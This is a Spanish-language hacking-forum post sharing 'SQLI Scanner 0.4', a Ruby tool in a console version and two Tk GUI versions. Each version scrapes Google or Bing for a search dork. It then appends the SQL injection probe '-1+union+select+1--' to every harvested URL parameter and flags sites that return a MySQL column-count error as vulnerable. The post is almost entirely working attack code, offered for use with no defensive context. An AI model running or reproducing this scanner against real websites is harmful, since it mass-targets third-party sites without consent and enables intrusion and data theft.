elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Como proteger una cartera - billetera de Bitcoin


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  [Ruby] SQLI Scanner 0.4
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: [Ruby] SQLI Scanner 0.4  (Leído 1,835 veces)
BigBear


Desconectado Desconectado

Mensajes: 545



Ver Perfil
[Ruby] SQLI Scanner 0.4
« en: 7 Agosto 2015, 22:25 pm »

Un simple script en Ruby para buscar paginas vulnerables a SQLI usando Google o Bing.

Version consola :

Código
  1. #!usr/bin/ruby
  2. #SQLI Scanner 0.4
  3. #(C) Doddy Hackman 2015
  4.  
  5. require "open-uri"
  6. require "net/http"
  7. require "openssl"
  8.  
  9. # Functions
  10.  
  11. def toma(web)
  12. begin
  13. return open(web, "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0").read
  14. rescue
  15. return "Error"
  16. end
  17. end
  18.  
  19.  
  20. def toma_ssl(web)
  21. uri = URI.parse(web)
  22. nave = Net::HTTP.new(uri.host, uri.port)
  23. nave.use_ssl = true
  24. nave.verify_mode = OpenSSL::SSL::VERIFY_NONE
  25. return nave.get(uri.request_uri,{"User-Agent"=> "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/20.0"}).body
  26. end
  27.  
  28.  
  29. def tomar(web,arg)
  30. begin
  31. headers = {"User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"}
  32. uri = URI(web)
  33. http = Net::HTTP.new(uri.host, uri.port)
  34. return http.post(uri.path,arg, headers).body
  35. rescue
  36. return "Error"
  37. end
  38. end
  39.  
  40. def cortar(pages)
  41. final = ""
  42. finales = []
  43. pages.flatten.each do |page|
  44. if page=~/(.*)=(.*)/
  45. parte1 = $1
  46. parte2 = $2
  47. final = parte1 + "="
  48. finales.push(final)
  49. end
  50. end
  51. return finales
  52. end
  53.  
  54.  
  55. def google(dork,pages)
  56.  
  57. links = []
  58. dork = dork.sub(/ /,"+")
  59. contador = 0
  60. for i in ("1"..pages)
  61. contador+=10
  62. code = toma_ssl("https://www.google.com.ar/search?hl=&q=" + dork+ "&start="+contador.to_s)
  63. paginas = code.scan(/(?<="r"><. href=")(.+?)"/)
  64. paginas.flatten.each do |pagina|
  65. partes = pagina
  66. if partes=~/url\?q=(.*)&amp;sa/
  67. parte = $1
  68. link = URI::decode(parte)
  69. links.push(link)
  70. end
  71. end
  72. end
  73. links = links.uniq
  74. return links
  75. end
  76.  
  77. def google_recursive(dork,pages)
  78. dork = dork.sub(/ /,"+")
  79. contador = 0
  80. guardo = []
  81. for i in ("1"..pages)
  82. contador+=10
  83. url = "https://www.google.com.ar/search?hl=&q="+dork+"&start="+contador.to_s
  84. code = toma_ssl(url)
  85. links = URI::extract(code)
  86. links.each do |link|
  87. if link=~/cache:(.*?):(.*?)\+/
  88. link_final = "http://"+$2
  89. link_final = URI::decode(link_final)
  90. guardo.push(link_final)
  91. end
  92. end
  93. end
  94. guardo = guardo.uniq
  95. return guardo
  96. end
  97.  
  98. def bing(dork,pages)
  99.  
  100. guardo = []
  101. dork = dork.sub(/ /,"+")
  102. contador = 0
  103. for i in ("1"..pages)
  104. contador+=10
  105.  
  106. code = toma("http://www.bing.com/search?q=" + dork + "&first=" + contador.to_s)
  107.  
  108. links = code.scan(/<h2><a href="(.*?)" h/)
  109.  
  110. links.flatten.each do |link|
  111. link_final = URI::decode(link)
  112. if not link_final=~/http:\/\/778802\.r\.msn\.com\//
  113. guardo.push(link_final)
  114. end
  115. end
  116.  
  117. links = code.scan(/<h3><a href="(.*?)" h/)
  118.  
  119. links.flatten.each do |link|
  120. link_final = URI::decode(link)
  121. if not link_final=~/http:\/\/778802\.r\.msn\.com\//
  122. guardo.push(link_final)
  123. end
  124. end
  125. end
  126. guardo = guardo.uniq
  127. return guardo
  128. end
  129.  
  130. def uso
  131. print "\n[+] Sintax : ruby scanner.rb <options> <dork> <pages>\n\n"
  132. print "-search_bing : Find in Bing\n"
  133. print "-search_google : Find in Google\n"
  134. print "-scan_bing : Find SQLI in Bing\n"
  135. print "-scan_google : Find SQLI in Google\n"
  136. print "\n[+] Example of use : ruby scanner.rb -scan_bing news.php+id 3\n"
  137. end
  138.  
  139. def  head
  140. print "\n\n-- == SQLI Scanner 0.4 == --\n\n"
  141. end
  142.  
  143. def copyright
  144. print "\n\n-- == (C) Doddy Hackman 2015 == --\n\n"
  145. end
  146.  
  147. opcion = ARGV[0]
  148. dork = ARGV[1]
  149. pages  = ARGV[2]
  150.  
  151. head()
  152.  
  153. if !opcion or !dork or !pages
  154. uso()
  155. else
  156.  
  157. if opcion=="-search_bing"
  158.  
  159. print "\n[+] Searching in Bing ...\n\n"
  160.  
  161. links = bing(dork,pages)
  162.  
  163. print "[+] Pages Count : "+links.count.to_s+"\n\n"
  164.  
  165. if links.count.to_s=="0"
  166. print "[-] Links not found\n"
  167. end
  168.  
  169. links.flatten.each do |link|
  170. print "[+] Link : "+link+"\n"
  171. end
  172.  
  173. print "\n[+] Finished\n"
  174.  
  175. elsif opcion=="-search_google"
  176.  
  177. print "\n[+] Searching in Google ...\n\n"
  178.  
  179. links = google(dork,pages)
  180.  
  181. if links.count.to_s=="0"
  182. print "[+] Searching in Google again ...\n\n"
  183. links = google_recursive(dork,pages)
  184. end
  185.  
  186. print "[+] Pages Count : "+links.count.to_s
  187.  
  188. if links.count.to_s=="0"
  189. print "[-] Links not found"
  190. end
  191.  
  192. links.flatten.each do |link|
  193. print "[+] Link : "+link+"\n"
  194. end
  195.  
  196. print "\n[+] Finished\n"
  197.  
  198. elsif opcion=="-scan_bing"
  199.  
  200. print "\n[+] Searching in Bing ...\n\n"
  201.  
  202. links = cortar(bing(dork,pages))
  203.  
  204. print "[+] Pages Count : "+links.count.to_s+"\n\n"
  205.  
  206. if links.count.to_s=="0"
  207. print "[-] Links not found\n"
  208. end
  209.  
  210. links.flatten.each do |link|
  211. print "[+] Link : "+link
  212. begin
  213. url = toma(link + "-1+union+select+1--")
  214. if url=~/The used SELECT statements have a different number of columns/
  215. print " [OK]\n\a\a"
  216. else
  217. print " [FAIL]\n"
  218. end
  219. rescue
  220. print " [FAIL]\n"
  221. end
  222. end
  223.  
  224. print "\n[+] Finished\n"
  225.  
  226. elsif opcion=="-scan_google"
  227.  
  228. print "\n[+] Searching in Google ...\n\n"
  229.  
  230. links = cortar(google(dork,pages))
  231.  
  232. if links.count.to_s=="0"
  233. print "[+] Searching in Google again ...\n\n"
  234. links = cortar(google_recursive(dork,pages))
  235. end
  236.  
  237. print "[+] Pages Count : "+links.count.to_s+"\n\n"
  238.  
  239. if links.count.to_s=="0"
  240. print "[-] Links not found"
  241. end
  242.  
  243. links.flatten.each do |link|
  244. print "[+] Link : "+link
  245. begin
  246. url = toma(link + "-1+union+select+1--")
  247. if url=~/The used SELECT statements have a different number of columns/
  248. print " [OK]\n\a\a"
  249. else
  250. print " [FAIL]\n"
  251. end
  252. rescue
  253. print " [FAIL]\n"
  254. end
  255. end
  256.  
  257. print "\n[+] Finished\n"
  258. else
  259. print "[-] Bad Option"
  260. end
  261. end
  262.  
  263. copyright()
  264.  
  265.  
  266. #The End ?
  267.  

Version Tk para Google :

Código
  1. #!usr/bin/ruby
  2. #SQLI Scanner 0.4
  3. #(C) Doddy Hackman 2015
  4. #Scan Google Tk
  5.  
  6. require "tk"
  7. require "open-uri"
  8. require "net/http"
  9. require "openssl"
  10.  
  11. # Functions
  12.  
  13. def toma(web)
  14. begin
  15. return open(web, "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0").read
  16. rescue
  17. return "Error"
  18. end
  19. end
  20.  
  21.  
  22. def toma_ssl(web)
  23. uri = URI.parse(web)
  24. nave = Net::HTTP.new(uri.host, uri.port)
  25. nave.use_ssl = true
  26. nave.verify_mode = OpenSSL::SSL::VERIFY_NONE
  27. return nave.get(uri.request_uri,{"User-Agent"=> "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/20.0"}).body
  28. end
  29.  
  30.  
  31. def tomar(web,arg)
  32. begin
  33. headers = {"User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"}
  34. uri = URI(web)
  35. http = Net::HTTP.new(uri.host, uri.port)
  36. return http.post(uri.path,arg, headers).body
  37. rescue
  38. return "Error"
  39. end
  40. end
  41.  
  42. def cortar(pages)
  43. final = ""
  44. finales = []
  45. pages.flatten.each do |page|
  46. if page=~/(.*)=(.*)/
  47. parte1 = $1
  48. parte2 = $2
  49. final = parte1 + "="
  50. finales.push(final)
  51. end
  52. end
  53. return finales
  54. end
  55.  
  56.  
  57. def google(dork,pages)
  58.  
  59. links = []
  60. dork = dork.sub(/ /,"+")
  61. contador = 0
  62. for i in ("1"..pages)
  63. contador+=10
  64. code = toma_ssl("https://www.google.com.ar/search?hl=&q=" + dork+ "&start="+contador.to_s)
  65. paginas = code.scan(/(?<="r"><. href=")(.+?)"/)
  66. paginas.flatten.each do |pagina|
  67. partes = pagina
  68. if partes=~/url\?q=(.*)&amp;sa/
  69. parte = $1
  70. link = URI::decode(parte)
  71. links.push(link)
  72. end
  73. end
  74. end
  75. links = links.uniq
  76. return links
  77. end
  78.  
  79. def google_recursive(dork,pages)
  80. dork = dork.sub(/ /,"+")
  81. contador = 0
  82. guardo = []
  83. for i in ("1"..pages)
  84. contador+=10
  85. url = "https://www.google.com.ar/search?hl=&q="+dork+"&start="+contador.to_s
  86. code = toma_ssl(url)
  87. links = URI::extract(code)
  88. links.each do |link|
  89. if link=~/cache:(.*?):(.*?)\+/
  90. link_final = "http://"+$2
  91. link_final = URI::decode(link_final)
  92. guardo.push(link_final)
  93. end
  94. end
  95. end
  96. guardo = guardo.uniq
  97. return guardo
  98. end
  99.  
  100. def bing(dork,pages)
  101.  
  102. guardo = []
  103. dork = dork.sub(/ /,"+")
  104. contador = 0
  105. for i in ("1"..pages)
  106. contador+=10
  107.  
  108. code = toma("http://www.bing.com/search?q=" + dork + "&first=" + contador.to_s)
  109.  
  110. links = code.scan(/<h2><a href="(.*?)" h/)
  111.  
  112. links.flatten.each do |link|
  113. link_final = URI::decode(link)
  114. if not link_final=~/http:\/\/778802\.r\.msn\.com\//
  115. guardo.push(link_final)
  116. end
  117. end
  118.  
  119. links = code.scan(/<h3><a href="(.*?)" h/)
  120.  
  121. links.flatten.each do |link|
  122. link_final = URI::decode(link)
  123. if not link_final=~/http:\/\/778802\.r\.msn\.com\//
  124. guardo.push(link_final)
  125. end
  126. end
  127. end
  128. guardo = guardo.uniq
  129. return guardo
  130. end
  131.  
  132. #
  133.  
  134. window = TkRoot.new { title "SQLI Scanner 0.4 - Scanner Google" ; background "black" }
  135. window['geometry'] = '300x320-20+10'
  136.  
  137. TkLabel.new(window) do
  138. background "black"
  139. foreground "green"
  140. text "    Dork : "
  141. place('relx'=>"0.1",'rely'=>"0.1")
  142. end
  143.  
  144. dork = TkEntry.new(window){
  145. background "black"
  146. foreground "green"
  147. width 25
  148. place('relx'=>0.3,'rely'=>0.1)
  149. }
  150.  
  151. TkLabel.new(window) do
  152. background "black"
  153. foreground "green"
  154. text "    Pages : "
  155. place('relx'=>"0.1",'rely'=>"0.2")
  156. end
  157.  
  158. pages = TkEntry.new(window){
  159. background "black"
  160. foreground "green"
  161. width 25
  162. place('relx'=>0.3,'rely'=>0.2)
  163. }
  164.  
  165. TkLabel.new(window) do
  166. background "black"
  167. foreground "green"
  168. text "Console"
  169. place('relx'=>0.4,'rely'=>0.3)
  170. end
  171.  
  172. console =TkText.new(window) do
  173. background "black"
  174. foreground "green"
  175. width 30
  176. height 9
  177. place('relx'=>0.1,'rely'=>0.4)
  178. end
  179.  
  180. TkButton.new(window) do
  181. text "Search"
  182.    background "black"
  183. foreground "green"
  184. width 17
  185. activebackground "green"
  186. highlightbackground  "green"
  187. command proc{
  188.  
  189. dork = dork.value.to_s
  190. pages = pages.value.to_s
  191.  
  192. console.insert("end",  "[+] Searching in Google ...\n\n")
  193.  
  194. links = cortar(google(dork,pages))
  195.  
  196. if links.count.to_s=="0"
  197. console.insert("end",  "[+] Searching in Google again ...\n\n")
  198. links = cortar(google_recursive(dork,pages))
  199. end
  200.  
  201. console.insert("end", "[+] Pages Count : "+links.count.to_s+"\n\n")
  202.  
  203. if links.count.to_s=="0"
  204. console.insert("end", "[-] Links not found")
  205. end
  206.  
  207. links.flatten.each do |link|
  208. console.insert("end", "[+] Link : "+link)
  209. begin
  210. url = toma(link + "-1+union+select+1--")
  211. if url=~/The used SELECT statements have a different number of columns/
  212. console.insert("end"," [OK]\n\a\a")
  213. else
  214. console.insert("end"," [FAIL]\n")
  215. end
  216. rescue
  217. console.insert("end", " [FAIL]\n")
  218. end
  219. end
  220.  
  221. console.insert("end",  "\n[+] Finished")
  222.  
  223. }
  224. place('relx'=>0.3,'rely'=>0.9)
  225. end
  226.  
  227. Tk.mainloop
  228.  
  229. #The End ?
  230.  

Una imagen :



Version Tk para Bing :

Código
  1. #!usr/bin/ruby
  2. #SQLI Scanner 0.4
  3. #(C) Doddy Hackman 2015
  4. #Scan Bing Tk
  5.  
  6. require "tk"
  7. require "open-uri"
  8. require "net/http"
  9. require "openssl"
  10.  
  11. # Functions
  12.  
  13. def toma(web)
  14. begin
  15. return open(web, "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0").read
  16. rescue
  17. return "Error"
  18. end
  19. end
  20.  
  21.  
  22. def toma_ssl(web)
  23. uri = URI.parse(web)
  24. nave = Net::HTTP.new(uri.host, uri.port)
  25. nave.use_ssl = true
  26. nave.verify_mode = OpenSSL::SSL::VERIFY_NONE
  27. return nave.get(uri.request_uri,{"User-Agent"=> "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/20.0"}).body
  28. end
  29.  
  30.  
  31. def tomar(web,arg)
  32. begin
  33. headers = {"User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"}
  34. uri = URI(web)
  35. http = Net::HTTP.new(uri.host, uri.port)
  36. return http.post(uri.path,arg, headers).body
  37. rescue
  38. return "Error"
  39. end
  40. end
  41.  
  42. def cortar(pages)
  43. final = ""
  44. finales = []
  45. pages.flatten.each do |page|
  46. if page=~/(.*)=(.*)/
  47. parte1 = $1
  48. parte2 = $2
  49. final = parte1 + "="
  50. finales.push(final)
  51. end
  52. end
  53. return finales
  54. end
  55.  
  56.  
  57. def google(dork,pages)
  58.  
  59. links = []
  60. dork = dork.sub(/ /,"+")
  61. contador = 0
  62. for i in ("1"..pages)
  63. contador+=10
  64. code = toma_ssl("https://www.google.com.ar/search?hl=&q=" + dork+ "&start="+contador.to_s)
  65. paginas = code.scan(/(?<="r"><. href=")(.+?)"/)
  66. paginas.flatten.each do |pagina|
  67. partes = pagina
  68. if partes=~/url\?q=(.*)&amp;sa/
  69. parte = $1
  70. link = URI::decode(parte)
  71. links.push(link)
  72. end
  73. end
  74. end
  75. links = links.uniq
  76. return links
  77. end
  78.  
  79. def google_recursive(dork,pages)
  80. dork = dork.sub(/ /,"+")
  81. contador = 0
  82. guardo = []
  83. for i in ("1"..pages)
  84. contador+=10
  85. url = "https://www.google.com.ar/search?hl=&q="+dork+"&start="+contador.to_s
  86. code = toma_ssl(url)
  87. links = URI::extract(code)
  88. links.each do |link|
  89. if link=~/cache:(.*?):(.*?)\+/
  90. link_final = "http://"+$2
  91. link_final = URI::decode(link_final)
  92. guardo.push(link_final)
  93. end
  94. end
  95. end
  96. guardo = guardo.uniq
  97. return guardo
  98. end
  99.  
  100. def bing(dork,pages)
  101.  
  102. guardo = []
  103. dork = dork.sub(/ /,"+")
  104. contador = 0
  105. for i in ("1"..pages)
  106. contador+=10
  107.  
  108. code = toma("http://www.bing.com/search?q=" + dork + "&first=" + contador.to_s)
  109.  
  110. links = code.scan(/<h2><a href="(.*?)" h/)
  111.  
  112. links.flatten.each do |link|
  113. link_final = URI::decode(link)
  114. if not link_final=~/http:\/\/778802\.r\.msn\.com\//
  115. guardo.push(link_final)
  116. end
  117. end
  118.  
  119. links = code.scan(/<h3><a href="(.*?)" h/)
  120.  
  121. links.flatten.each do |link|
  122. link_final = URI::decode(link)
  123. if not link_final=~/http:\/\/778802\.r\.msn\.com\//
  124. guardo.push(link_final)
  125. end
  126. end
  127. end
  128. guardo = guardo.uniq
  129. return guardo
  130. end
  131.  
  132. #
  133.  
  134. window = TkRoot.new { title "SQLI Scanner 0.4 - Scanner Bing" ; background "black" }
  135. window['geometry'] = '300x320-20+10'
  136.  
  137. TkLabel.new(window) do
  138. background "black"
  139. foreground "green"
  140. text "    Dork : "
  141. place('relx'=>"0.1",'rely'=>"0.1")
  142. end
  143.  
  144. dork = TkEntry.new(window){
  145. background "black"
  146. foreground "green"
  147. width 25
  148. place('relx'=>0.3,'rely'=>0.1)
  149. }
  150.  
  151. TkLabel.new(window) do
  152. background "black"
  153. foreground "green"
  154. text "    Pages : "
  155. place('relx'=>"0.1",'rely'=>"0.2")
  156. end
  157.  
  158. pages = TkEntry.new(window){
  159. background "black"
  160. foreground "green"
  161. width 25
  162. place('relx'=>0.3,'rely'=>0.2)
  163. }
  164.  
  165. TkLabel.new(window) do
  166. background "black"
  167. foreground "green"
  168. text "Console"
  169. place('relx'=>0.4,'rely'=>0.3)
  170. end
  171.  
  172. console =TkText.new(window) do
  173. background "black"
  174. foreground "green"
  175. width 30
  176. height 9
  177. place('relx'=>0.1,'rely'=>0.4)
  178. end
  179.  
  180. TkButton.new(window) do
  181. text "Search"
  182.    background "black"
  183. foreground "green"
  184. width 17
  185. activebackground "green"
  186. highlightbackground  "green"
  187. command proc{
  188.  
  189. dork = dork.value.to_s
  190. pages = pages.value.to_s
  191.  
  192. console.insert("end", "[+] Searching in Bing ...\n\n")
  193.  
  194. links = cortar(bing(dork,pages))
  195.  
  196. console.insert("end", "[+] Pages Count : "+links.count.to_s+"\n\n")
  197.  
  198. if links.count.to_s=="0"
  199. console.insert("end","[-] Links not found\n")
  200. end
  201.  
  202. links.flatten.each do |link|
  203. console.insert("end", "[+] Link : "+link)
  204. begin
  205. url = toma(link + "-1+union+select+1--")
  206. if url=~/The used SELECT statements have a different number of columns/
  207. console.insert("end"," [OK]\n\a\a")
  208. else
  209. console.insert("end", " [FAIL]\n")
  210. end
  211. rescue
  212. console.insert("end"," [FAIL]\n")
  213. end
  214. end
  215.  
  216. console.insert("end",  "\n[+] Finished")
  217.  
  218. }
  219. place('relx'=>0.3,'rely'=>0.9)
  220. end
  221.  
  222. Tk.mainloop
  223.  
  224. #The End ?
  225.  

Una imagen :



Eso es todo.


En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
[Ruby] SQLI Scanner
Scripting
BigBear 0 2,103 Último mensaje 7 Octubre 2011, 01:32 am
por BigBear
[Java] SQLI Scanner 0.2
Java
BigBear 1 2,948 Último mensaje 22 Enero 2013, 16:27 pm
por Slider324
[C#] SQLI Scanner 0.4
.NET (C#, VB.NET, ASP)
BigBear 0 2,847 Último mensaje 18 Julio 2014, 01:36 am
por BigBear
[Ruby] LFI Scanner 0.3
Scripting
BigBear 0 1,740 Último mensaje 21 Agosto 2015, 23:37 pm
por BigBear
[Java] SQLI Scanner 0.4
Java
BigBear 0 1,577 Último mensaje 5 Marzo 2016, 16:15 pm
por BigBear
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines